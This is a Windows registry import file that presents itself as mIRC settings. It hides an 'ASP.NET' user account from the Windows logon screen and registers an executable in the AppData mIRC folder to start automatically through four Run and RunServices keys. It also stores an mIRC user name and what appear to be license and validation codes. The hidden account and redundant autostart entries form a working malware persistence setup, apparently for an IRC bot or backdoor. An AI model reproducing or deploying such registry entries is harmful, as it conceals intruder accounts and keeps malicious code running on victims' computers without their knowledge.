REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"ASP.NET"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
@="%appdata%\\mIRC\\init.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
@@="%appdata%\\mIRC\\init.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@@@="%appdata%\\mIRC\\init.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
@@@@="%appdata%\\mIRC\\init.exe"

[HKEY_CURRENT_USER\Software\mIRC]
 
[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1297961851,0"
 
[HKEY_CURRENT_USER\Software\mIRC\License]
@="5436-531206"
 
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="DeltaFoX"
 
[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="1337-347150-2018"